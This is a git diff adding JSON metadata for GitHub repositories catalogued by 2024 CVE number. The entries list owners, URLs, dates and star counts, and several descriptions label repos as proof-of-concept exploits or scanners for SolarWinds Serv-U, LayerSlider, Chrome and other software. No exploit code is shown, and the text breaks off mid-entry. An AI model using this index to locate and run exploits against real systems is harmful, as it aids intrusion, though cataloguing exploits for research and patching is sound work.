@@ +[ + { + "id": 771275327, + "name": "CVE-2024-28715", + "full_name": "Lq0ne\/CVE-2024-28715", + "owner": { + "login": "Lq0ne", + "id": 52685569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52685569?v=4", + "html_url": "https:\/\/github.com\/Lq0ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lq0ne\/CVE-2024-28715", + "description": null, + "fork": false, + "created_at": "2024-03-13T01:59:57Z", + "updated_at": "2024-03-13T01:59:57Z", + "pushed_at": "2024-03-13T02:14:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28741.json b/2024/CVE-2024-28741.json new file mode 100644 index 0000000000..505a8a9bcb --- /dev/null +++ b/2024/CVE-2024-28741.json @@ -0,0 +1,33 @@ +[ + { + "id": 770691742, + "name": "CVE-2024-28741-northstar-agent-rce-poc", + "full_name": "chebuya\/CVE-2024-28741-northstar-agent-rce-poc", + "owner": { + "login": "chebuya", + "id": 146861503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146861503?v=4", + "html_url": "https:\/\/github.com\/chebuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chebuya\/CVE-2024-28741-northstar-agent-rce-poc", + "description": "Agent RCE PoC for CVE-2024-28741, a stored XSS vulnerability in NorthStar C2.", + "fork": false, + "created_at": "2024-03-12T01:40:35Z", + "updated_at": "2024-04-16T23:51:09Z", + "pushed_at": "2024-03-12T02:16:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28757.json b/2024/CVE-2024-28757.json new file mode 100644 index 0000000000..bbc2e9904b --- /dev/null +++ b/2024/CVE-2024-28757.json @@ -0,0 +1,95 @@ +[ + { + "id": 795435234, + "name": "expat_CVE-2024-28757", + "full_name": "RenukaSelvar\/expat_CVE-2024-28757", + "owner": { + "login": "RenukaSelvar", + "id": 165150685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165150685?v=4", + "html_url": "https:\/\/github.com\/RenukaSelvar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RenukaSelvar\/expat_CVE-2024-28757", + "description": null, + "fork": false, + "created_at": "2024-05-03T09:21:27Z", + "updated_at": "2024-05-03T09:27:12Z", + "pushed_at": "2024-05-03T09:27:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795436472, + "name": "expat_2_1_0_CVE-2024-28757", + "full_name": "saurabh2088\/expat_2_1_0_CVE-2024-28757", + "owner": { + "login": "saurabh2088", + "id": 52776238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52776238?v=4", + "html_url": "https:\/\/github.com\/saurabh2088", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saurabh2088\/expat_2_1_0_CVE-2024-28757", + "description": null, + "fork": false, + "created_at": "2024-05-03T09:24:51Z", + "updated_at": "2024-05-03T11:01:45Z", + "pushed_at": "2024-05-03T10:55:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795453931, + "name": "expat_2_1_1_CVE-2024-28757", + "full_name": "saurabh2088\/expat_2_1_1_CVE-2024-28757", + "owner": { + "login": "saurabh2088", + "id": 52776238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52776238?v=4", + "html_url": "https:\/\/github.com\/saurabh2088", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saurabh2088\/expat_2_1_1_CVE-2024-28757", + "description": null, + "fork": false, + "created_at": "2024-05-03T10:11:38Z", + "updated_at": "2024-05-03T10:11:38Z", + "pushed_at": "2024-05-03T10:11:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2876.json b/2024/CVE-2024-2876.json new file mode 100644 index 0000000000..6289ee15d5 --- /dev/null +++ b/2024/CVE-2024-2876.json @@ -0,0 +1,157 @@ +[ + { + "id": 791752007, + "name": "CVE-2024-2876", + "full_name": "c0d3zilla\/CVE-2024-2876", + "owner": { + "login": "c0d3zilla", + "id": 168064397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168064397?v=4", + "html_url": "https:\/\/github.com\/c0d3zilla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0d3zilla\/CVE-2024-2876", + "description": "POC for SQLi vulnerability in Icegram express ", + "fork": false, + "created_at": "2024-04-25T09:53:22Z", + "updated_at": "2024-09-26T13:11:40Z", + "pushed_at": "2024-04-25T09:55:55Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857423263, + "name": "CVE-2024-2876", + "full_name": "Quantum-Hacker\/CVE-2024-2876", + "owner": { + "login": "Quantum-Hacker", + "id": 140636140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140636140?v=4", + "html_url": "https:\/\/github.com\/Quantum-Hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Quantum-Hacker\/CVE-2024-2876", + "description": null, + "fork": false, + "created_at": "2024-09-14T16:08:56Z", + "updated_at": "2025-01-03T23:35:25Z", + "pushed_at": "2024-09-15T15:53:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858561765, + "name": "CVE-2024-2876", + "full_name": "0xAgun\/CVE-2024-2876", + "owner": { + "login": "0xAgun", + "id": 78228966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78228966?v=4", + "html_url": "https:\/\/github.com\/0xAgun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAgun\/CVE-2024-2876", + "description": null, + "fork": false, + "created_at": "2024-09-17T05:54:18Z", + "updated_at": "2024-11-07T22:31:55Z", + "pushed_at": "2024-09-17T05:54:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870293883, + "name": "CVE-2024-2876", + "full_name": "skyrowalker\/CVE-2024-2876", + "owner": { + "login": "skyrowalker", + "id": 156471538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156471538?v=4", + "html_url": "https:\/\/github.com\/skyrowalker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyrowalker\/CVE-2024-2876", + "description": null, + "fork": false, + "created_at": "2024-10-09T19:24:53Z", + "updated_at": "2024-12-31T13:26:25Z", + "pushed_at": "2024-10-11T20:09:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889247775, + "name": "CVE-2024-2876", + "full_name": "issamjr\/CVE-2024-2876", + "owner": { + "login": "issamjr", + "id": 101994309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101994309?v=4", + "html_url": "https:\/\/github.com\/issamjr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/issamjr\/CVE-2024-2876", + "description": "WP-SQL-Injection CVE-2024-2876 AND 2024-CVE-2024-3495", + "fork": false, + "created_at": "2024-11-15T22:39:48Z", + "updated_at": "2024-11-20T16:31:11Z", + "pushed_at": "2024-11-15T22:50:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2879.json b/2024/CVE-2024-2879.json new file mode 100644 index 0000000000..3680460471 --- /dev/null +++ b/2024/CVE-2024-2879.json @@ -0,0 +1,33 @@ +[ + { + "id": 783878190, + "name": "CVE-2024-2879", + "full_name": "herculeszxc\/CVE-2024-2879", + "owner": { + "login": "herculeszxc", + "id": 62851950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62851950?v=4", + "html_url": "https:\/\/github.com\/herculeszxc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/herculeszxc\/CVE-2024-2879", + "description": "CVE-2024-2879 - LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-04-08T18:50:02Z", + "updated_at": "2024-11-02T03:07:10Z", + "pushed_at": "2024-04-08T19:16:28Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2887.json b/2024/CVE-2024-2887.json new file mode 100644 index 0000000000..a02ac2cde9 --- /dev/null +++ b/2024/CVE-2024-2887.json @@ -0,0 +1,64 @@ +[ + { + "id": 847220455, + "name": "Chrome-CVE-2024-2887-RCE-POC", + "full_name": "PumpkinBridge\/Chrome-CVE-2024-2887-RCE-POC", + "owner": { + "login": "PumpkinBridge", + "id": 139355470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139355470?v=4", + "html_url": "https:\/\/github.com\/PumpkinBridge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PumpkinBridge\/Chrome-CVE-2024-2887-RCE-POC", + "description": "Chrome(CVE-2024-2887)RCE-POC", + "fork": false, + "created_at": "2024-08-25T07:30:25Z", + "updated_at": "2025-01-02T19:12:31Z", + "pushed_at": "2024-08-25T07:33:36Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847293372, + "name": "CVE-2024-2887", + "full_name": "rycbar77\/CVE-2024-2887", + "owner": { + "login": "rycbar77", + "id": 35279858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35279858?v=4", + "html_url": "https:\/\/github.com\/rycbar77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rycbar77\/CVE-2024-2887", + "description": "For V8CTF M123", + "fork": false, + "created_at": "2024-08-25T12:13:07Z", + "updated_at": "2024-12-13T06:23:15Z", + "pushed_at": "2024-08-25T13:04:44Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28987.json b/2024/CVE-2024-28987.json new file mode 100644 index 0000000000..a5d4d7d923 --- /dev/null +++ b/2024/CVE-2024-28987.json @@ -0,0 +1,126 @@ +[ + { + "id": 852696537, + "name": "CVE-2024-28987-POC", + "full_name": "gh-ost00\/CVE-2024-28987-POC", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-28987-POC", + "description": "Web Help Desk Hardcoded Credential Vulnerability (CVE-2024-28987)", + "fork": false, + "created_at": "2024-09-05T09:01:58Z", + "updated_at": "2024-12-17T20:19:30Z", + "pushed_at": "2024-09-05T09:23:59Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 862512431, + "name": "CVE-2024-28987", + "full_name": "horizon3ai\/CVE-2024-28987", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-28987", + "description": "Proof of Concept Exploit for CVE-2024-28987: SolarWinds Web Help Desk Hardcoded Credential Vulnerability", + "fork": false, + "created_at": "2024-09-24T18:12:38Z", + "updated_at": "2024-10-09T19:42:18Z", + "pushed_at": "2024-09-24T18:27:47Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 865494019, + "name": "CVE-2024-28987", + "full_name": "PlayerFridei\/CVE-2024-28987", + "owner": { + "login": "PlayerFridei", + "id": 55279232, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55279232?v=4", + "html_url": "https:\/\/github.com\/PlayerFridei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PlayerFridei\/CVE-2024-28987", + "description": "CVE-2024-28987 Scanner & Exploiter - SolarWinds Web Help Desk", + "fork": false, + "created_at": "2024-09-30T16:12:14Z", + "updated_at": "2025-01-06T20:50:26Z", + "pushed_at": "2025-01-06T20:50:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889030458, + "name": "CVE-2024-28987", + "full_name": "expl0itsecurity\/CVE-2024-28987", + "owner": { + "login": "expl0itsecurity", + "id": 185355311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185355311?v=4", + "html_url": "https:\/\/github.com\/expl0itsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/expl0itsecurity\/CVE-2024-28987", + "description": null, + "fork": false, + "created_at": "2024-11-15T13:27:46Z", + "updated_at": "2024-12-14T20:30:29Z", + "pushed_at": "2024-11-15T13:31:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28995.json b/2024/CVE-2024-28995.json new file mode 100644 index 0000000000..7995b6f8aa --- /dev/null +++ b/2024/CVE-2024-28995.json @@ -0,0 +1,290 @@ +[ + { + "id": 814960106, + "name": "CVE-2024-28995", + "full_name": "krypton-kry\/CVE-2024-28995", + "owner": { + "login": "krypton-kry", + "id": 66370436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66370436?v=4", + "html_url": "https:\/\/github.com\/krypton-kry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/krypton-kry\/CVE-2024-28995", + "description": "CVE-2024-28995 PoC", + "fork": false, + "created_at": "2024-06-14T04:06:58Z", + "updated_at": "2024-06-30T06:24:58Z", + "pushed_at": "2024-06-14T04:07:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815032884, + "name": "CVE-2024-28995", + "full_name": "ggfzx\/CVE-2024-28995", + "owner": { + "login": "ggfzx", + "id": 86279656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86279656?v=4", + "html_url": "https:\/\/github.com\/ggfzx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggfzx\/CVE-2024-28995", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:56:03Z", + "updated_at": "2024-06-21T07:13:08Z", + "pushed_at": "2024-06-14T07:58:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815034714, + "name": "CVE-2024-28995-Nuclei-Template", + "full_name": "huseyinstif\/CVE-2024-28995-Nuclei-Template", + "owner": { + "login": "huseyinstif", + "id": 54823077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54823077?v=4", + "html_url": "https:\/\/github.com\/huseyinstif", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huseyinstif\/CVE-2024-28995-Nuclei-Template", + "description": null, + "fork": false, + "created_at": "2024-06-14T08:01:13Z", + "updated_at": "2024-06-14T08:01:19Z", + "pushed_at": "2024-06-14T08:01:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815035984, + "name": "CVE-2024-28995", + "full_name": "0xc4t\/CVE-2024-28995", + "owner": { + "login": "0xc4t", + "id": 105418279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105418279?v=4", + "html_url": "https:\/\/github.com\/0xc4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xc4t\/CVE-2024-28995", + "description": "Exploit for CVE-2024-28995", + "fork": false, + "created_at": "2024-06-14T08:04:48Z", + "updated_at": "2024-07-24T08:32:09Z", + "pushed_at": "2024-06-14T08:08:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815346726, + "name": "CVE-2024-28995", + "full_name": "bigb0x\/CVE-2024-28995", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-28995", + "description": "CVE-2024-28995 POC Vulnerability Scanner", + "fork": false, + "created_at": "2024-06-14T23:05:40Z", + "updated_at": "2024-12-02T11:01:03Z", + "pushed_at": "2024-06-15T12:21:28Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816000240, + "name": "CVE-2024-28995", + "full_name": "muhammetali20\/CVE-2024-28995", + "owner": { + "login": "muhammetali20", + "id": 11004443, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11004443?v=4", + "html_url": "https:\/\/github.com\/muhammetali20", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/muhammetali20\/CVE-2024-28995", + "description": "SolarWinds Serv-U Directory Traversal Vulnerability (CVE-2024-28995) POC", + "fork": false, + "created_at": "2024-06-16T19:24:15Z", + "updated_at": "2024-06-16T19:24:15Z", + "pushed_at": "2024-06-14T09:51:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 820377551, + "name": "CVE-2024-28995-SolarWinds-Serv-U", + "full_name": "Praison001\/CVE-2024-28995-SolarWinds-Serv-U", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-28995-SolarWinds-Serv-U", + "description": "Exploit for CVE-2024-28995 affecting SolarWinds Serv-U 15.4.2 HF 1 and previous versions", + "fork": false, + "created_at": "2024-06-26T10:51:50Z", + "updated_at": "2024-11-20T16:30:52Z", + "pushed_at": "2024-06-26T11:54:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822568244, + "name": "CVE-2024-28995", + "full_name": "Stuub\/CVE-2024-28995", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-28995", + "description": "CVE-2024-28955 Exploitation PoC ", + "fork": false, + "created_at": "2024-07-01T11:49:51Z", + "updated_at": "2024-12-13T10:42:54Z", + "pushed_at": "2024-07-01T12:53:21Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024", + "cve-2024-28995", + "exploit", + "nist", + "owasp", + "poc", + "solarwinds" + ], + "visibility": "public", + "forks": 5, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 847037561, + "name": "CVE-2024-28995", + "full_name": "gotr00t0day\/CVE-2024-28995", + "owner": { + "login": "gotr00t0day", + "id": 48636787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48636787?v=4", + "html_url": "https:\/\/github.com\/gotr00t0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gotr00t0day\/CVE-2024-28995", + "description": "SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine. ", + "fork": false, + "created_at": "2024-08-24T17:05:48Z", + "updated_at": "2024-10-24T16:54:42Z", + "pushed_at": "2024-08-24T17:22:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28999.json b/2024/CVE-2024-28999.json new file mode 100644 index 0000000000..23cc9c726f --- /dev/null +++ b/2024/CVE-2024-28999.json @@ -0,0 +1,33 @@ +[ + { + "id": 818662371, + "name": "CVE-2024-28999", + "full_name": "HussainFathy\/CVE-2024-28999", + "owner": { + "login": "HussainFathy", + "id": 76268960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76268960?v=4", + "html_url": "https:\/\/github.com\/HussainFathy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HussainFathy\/CVE-2024-28999", + "description": "Exploit for CVE-2024-28999 SolarWinds Platform Race Condition Vulnerability - login page", + "fork": false, + "created_at": "2024-06-22T13:39:56Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-06-22T17:28:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29050.json b/2024/CVE-2024-29050.json new file mode 100644 index 0000000000..ca46cc49af --- /dev/null +++ b/2024/CVE-2024-29050.json @@ -0,0 +1,33 @@ +[ + { + "id": 867522608, + "name": "CVE-2024-29050", + "full_name": "Akrachli\/CVE-2024-29050", + "owner": { + "login": "Akrachli", + "id": 75633934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75633934?v=4", + "html_url": "https:\/\/github.com\/Akrachli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akrachli\/CVE-2024-29050", + "description": "CVE-2024-29050 is a vulnerability found in the Windows Cryptographic Services.", + "fork": false, + "created_at": "2024-10-04T08:19:11Z", + "updated_at": "2024-10-07T14:07:37Z", + "pushed_at": "2024-10-04T08:24:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29059.json b/2024/CVE-2024-29059.json new file mode 100644 index 0000000000..41cefefadb --- /dev/null +++ b/2024/CVE-2024-29059.json @@ -0,0 +1,33 @@ +[ + { + "id": 770302104, + "name": "HttpRemotingObjRefLeak", + "full_name": "codewhitesec\/HttpRemotingObjRefLeak", + "owner": { + "login": "codewhitesec", + "id": 8680262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8680262?v=4", + "html_url": "https:\/\/github.com\/codewhitesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/codewhitesec\/HttpRemotingObjRefLeak", + "description": "Additional resources for leaking and exploiting ObjRefs via HTTP .NET Remoting (CVE-2024-29059)", + "fork": false, + "created_at": "2024-03-11T10:14:39Z", + "updated_at": "2024-12-06T23:58:07Z", + "pushed_at": "2024-03-25T12:56:16Z", + "stargazers_count": 85, + "watchers_count": 85, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 85, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29269.json b/2024/CVE-2024-29269.json new file mode 100644 index 0000000000..96258f5368 --- /dev/null +++ b/2024/CVE-2024-29269.json @@ -0,0 +1,239 @@ +[ + { + "id": 781235641, + "name": "CVE-2024-29269", + "full_name": "wutalent\/CVE-2024-29269", + "owner": { + "login": "wutalent", + "id": 83970507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83970507?v=4", + "html_url": "https:\/\/github.com\/wutalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wutalent\/CVE-2024-29269", + "description": "CVE-2024-29269", + "fork": false, + "created_at": "2024-04-03T02:02:27Z", + "updated_at": "2024-06-07T15:48:55Z", + "pushed_at": "2024-04-03T02:19:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 785588692, + "name": "CVE-2024-29269", + "full_name": "YongYe-Security\/CVE-2024-29269", + "owner": { + "login": "YongYe-Security", + "id": 90460865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4", + "html_url": "https:\/\/github.com\/YongYe-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2024-29269", + "description": "Telesquare TLR-2005KSH_RCE (CVE-2024-29269) Batch scan\/exploit", + "fork": false, + "created_at": "2024-04-12T07:36:08Z", + "updated_at": "2024-11-06T23:16:30Z", + "pushed_at": "2024-04-12T07:58:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802976156, + "name": "CVE-2024-29269", + "full_name": "Chocapikk\/CVE-2024-29269", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-29269", + "description": "An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run 